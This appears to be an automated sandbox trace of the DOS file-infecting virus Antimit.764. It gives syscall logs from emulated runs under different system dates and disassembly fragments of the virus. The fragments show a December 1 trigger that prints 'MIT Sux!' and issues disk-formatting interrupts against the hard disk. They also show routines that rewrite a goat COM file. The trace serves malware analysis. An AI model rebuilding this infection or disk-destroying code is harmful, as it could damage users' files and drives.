Sample viewer

vx.netlux.org/Virus.DOS.Antimit.764

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:22.787501195Z 25 PC: 12a59 | Get default drive
2018-12-17T23:11:22.789253359Z 14 PC: 12a5f | Set default drive (Drive = 'Õ')
2018-12-17T23:11:22.790277278Z 42 PC: 12a94 | Get date
0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-17T23:11:22.791952434Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:11:22.793932828Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:11:22.795056659Z 26 PC: 12aef | Set disk transfer address
2018-12-17T23:11:22.796150478Z 78 PC: 12af9 | Find first file
2018-12-17T23:11:22.80277743Z 79 PC: 12b1e | Find next file
2018-12-17T23:11:22.805939118Z 79 PC: 12b1e | Find next file
2018-12-17T23:11:22.809067311Z 79 PC: 12b1e | Find next file
2018-12-17T23:11:22.812345292Z 79 PC: 12b1e | Find next file
2018-12-17T23:11:22.816617728Z 79 PC: 12b1e | Find next file
2018-12-17T23:11:22.819674838Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T23:11:22.826228667Z 67 PC: 12b4f | Get or set file attributes
2018-12-17T23:11:22.844902617Z 61 PC: 12b54 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:11:22.85221404Z 87 PC: 12b5d | Get or set file date and time
2018-12-17T23:11:22.853632941Z 63 PC: 12b6f | Read file or device (Read 474 bytes on handle 5)
2018-12-17T23:11:22.861481019Z 66 PC: 12b80 | Move file pointer
2018-12-17T23:11:22.863109252Z 64 PC: 12b91 | Write file or device (Write 290 bytes on handle 5)
2018-12-17T23:11:22.871840981Z 64 PC: 12ba2 | Write file or device (Write 474 bytes on handle 5)
2018-12-17T23:11:22.881445965Z 66 PC: 12bb3 | Move file pointer
2018-12-17T23:11:22.883415135Z 44 PC: 12bb9 | Get time
0x12bb9: mov byte ptr [0x105], dh
0x12bbd: call 0x22a46
0x12bc0: mov ah, 0x40
0x12bc2: mov dx, 0x100
0x12bc5: mov cx, 0x1da
0x12bc8: int 0x21
0x12bca: jb 0x12c0d
0x12bcc: cmp ax, 0x1da
0x12bcf: jne 0x12c0d
0x12bd1: jmp 0x12bde
0x12bd3: mov al, 0
0x12bd5: iret
0x12bd6: sub byte ptr [di + 0x4d88], cl
0x12bda: push bp
0x12bdb: add word ptr [bx + 0x11], dx
0x12bde: mov ax, 0x5701
0x12be1: mov cx, word ptr [0x296]
0x12be5: mov dx, word ptr [0x298]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x1f
2018-12-17T23:11:22.886307632Z 25 PC: 12a59 | Get default drive
2018-12-17T23:11:22.889607802Z 14 PC: 12a5f | Set default drive (Drive = 'Š')
2018-12-17T23:11:22.891010809Z 64 PC: 12bca | Write file or device (Write 474 bytes on handle 5)
2018-12-17T23:11:22.898603928Z 87 PC: 12bf1 | Get or set file date and time
2018-12-17T23:11:22.900594524Z 62 PC: 12bf5 | Close file
2018-12-17T23:11:22.910271245Z 26 PC: 12bfc | Set disk transfer address
2018-12-17T23:11:22.911503018Z 37 PC: 12c0c | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:11:22.9130329Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-17T23:11:22.919909697Z 48 PC: 12a8f | Get DOS version
2018-12-17T23:11:22.92162981Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-17T23:11:22.93020997Z 93 PC: 12afe | File sharing functions
2018-12-17T23:11:22.933646506Z 9 PC: 12a86 | Display string (String= 'Size change=02FCh/00764d. ')
2018-12-17T23:11:22.938746538Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17168,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:05.68336702Z 25 PC: 12a59 | Get default drive
2018-12-25T12:55:05.685437002Z 14 PC: 12a5f | Set default drive (Drive = 'Õ')
2018-12-25T12:55:05.687230599Z 42 PC: 12a94 | Get date
0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:55:05.690035959Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:05.692795405Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:05.694634385Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:55:05.696235943Z 78 PC: 12af9 | Find first file
2018-12-25T12:55:05.703092723Z 79 PC: 12b1e | Find next file
2018-12-25T12:55:05.706236325Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:05.709158081Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:05.712021743Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:05.715889656Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:05.718838012Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T12:55:05.725374999Z 67 PC: 12b4f | Get or set file attributes
2018-12-25T12:55:05.74321212Z 61 PC: 12b54 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:55:05.759905002Z 87 PC: 12b5d | Get or set file date and time
2018-12-25T12:55:05.761702277Z 63 PC: 12b6f | Read file or device (Read 474 bytes on handle 5)
2018-12-25T12:55:05.771732998Z 66 PC: 12b80 | Move file pointer
2018-12-25T12:55:05.772991435Z 64 PC: 12b91 | Write file or device (Write 290 bytes on handle 5)
2018-12-25T12:55:05.779908213Z 64 PC: 12ba2 | Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:55:05.786993573Z 66 PC: 12bb3 | Move file pointer
2018-12-25T12:55:05.788213234Z 44 PC: 12bb9 | Get time
0x12bb9: mov byte ptr [0x105], dh
0x12bbd: call 0x22a46
0x12bc0: mov ah, 0x40
0x12bc2: mov dx, 0x100
0x12bc5: mov cx, 0x1da
0x12bc8: int 0x21
0x12bca: jb 0x12c0d
0x12bcc: cmp ax, 0x1da
0x12bcf: jne 0x12c0d
0x12bd1: jmp 0x12bde
0x12bd3: mov al, 0
0x12bd5: iret
0x12bd6: sub byte ptr [di + 0x4d88], cl
0x12bda: push bp
0x12bdb: add word ptr [bx + 0x11], dx
0x12bde: mov ax, 0x5701
0x12be1: mov cx, word ptr [0x296]
0x12be5: mov dx, word ptr [0x298]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x1f
2018-12-25T12:55:05.789970802Z 25 PC: 12a59 | Get default drive (See above)
2018-12-25T12:55:05.792545426Z 14 PC: 12a5f | Set default drive (See above)
2018-12-25T12:55:05.793754978Z 64 PC: 12bca | Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:55:05.799956299Z 87 PC: 12bf1 | Get or set file date and time
2018-12-25T12:55:05.802462316Z 62 PC: 12bf5 | Close file
2018-12-25T12:55:05.812672911Z 26 PC: 12bfc | Set disk transfer address
2018-12-25T12:55:05.814393929Z 37 PC: 12c0c | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:05.816337277Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:55:05.824102146Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:55:05.825937657Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:55:05.833755773Z 93 PC: 12afe | File sharing functions
2018-12-25T12:55:05.837383112Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:55:05.8423472Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17168,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:05.885444277Z 25 PC: 12a59 | Get default drive
2018-12-25T12:55:05.888895856Z 14 PC: 12a5f | Set default drive (Drive = 'Õ')
2018-12-25T12:55:05.890766455Z 42 PC: 12a94 | Get date
0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:55:05.896148795Z 9 PC: 12aa5 | Display string (String= 'MIT Sux! ')
2018-12-25T12:55:05.902359332Z 76 PC: 12abf | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":2,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17168,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:06.322028403Z 25 PC: 12a59 | Get default drive
2018-12-25T12:55:06.324612305Z 14 PC: 12a5f | Set default drive (Drive = 'Õ')
2018-12-25T12:55:06.326383549Z 42 PC: 12a94 | Get date
0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:55:06.329342677Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:06.33209844Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:06.333749623Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:55:06.335367274Z 78 PC: 12af9 | Find first file
2018-12-25T12:55:06.342927442Z 79 PC: 12b1e | Find next file
2018-12-25T12:55:06.346293884Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:06.349685333Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:06.353831035Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:06.357133734Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:06.360315197Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T12:55:06.366977517Z 67 PC: 12b4f | Get or set file attributes
2018-12-25T12:55:06.386947417Z 61 PC: 12b54 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:55:06.394431122Z 87 PC: 12b5d | Get or set file date and time
2018-12-25T12:55:06.395800971Z 63 PC: 12b6f | Read file or device (Read 474 bytes on handle 5)
2018-12-25T12:55:06.401384635Z 66 PC: 12b80 | Move file pointer
2018-12-25T12:55:06.402576904Z 64 PC: 12b91 | Write file or device (Write 290 bytes on handle 5)
2018-12-25T12:55:06.407854246Z 64 PC: 12ba2 | Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:55:06.413837725Z 66 PC: 12bb3 | Move file pointer
2018-12-25T12:55:06.415072743Z 44 PC: 12bb9 | Get time
0x12bb9: mov byte ptr [0x105], dh
0x12bbd: call 0x22a46
0x12bc0: mov ah, 0x40
0x12bc2: mov dx, 0x100
0x12bc5: mov cx, 0x1da
0x12bc8: int 0x21
0x12bca: jb 0x12c0d
0x12bcc: cmp ax, 0x1da
0x12bcf: jne 0x12c0d
0x12bd1: jmp 0x12bde
0x12bd3: mov al, 0
0x12bd5: iret
0x12bd6: sub byte ptr [di + 0x4d88], cl
0x12bda: push bp
0x12bdb: add word ptr [bx + 0x11], dx
0x12bde: mov ax, 0x5701
0x12be1: mov cx, word ptr [0x296]
0x12be5: mov dx, word ptr [0x298]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x1f
2018-12-25T12:55:06.416843362Z 25 PC: 12a59 | Get default drive (See above)
2018-12-25T12:55:06.418247116Z 14 PC: 12a5f | Set default drive (See above)
2018-12-25T12:55:06.420512701Z 64 PC: 12bca | Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:55:06.428352039Z 87 PC: 12bf1 | Get or set file date and time
2018-12-25T12:55:06.434151585Z 62 PC: 12bf5 | Close file
2018-12-25T12:55:06.443148462Z 26 PC: 12bfc | Set disk transfer address
2018-12-25T12:55:06.444788352Z 37 PC: 12c0c | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:06.446957806Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:55:06.45520005Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:55:06.456931711Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:55:06.46458528Z 93 PC: 12afe | File sharing functions
2018-12-25T12:55:06.467849776Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:55:06.47258622Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')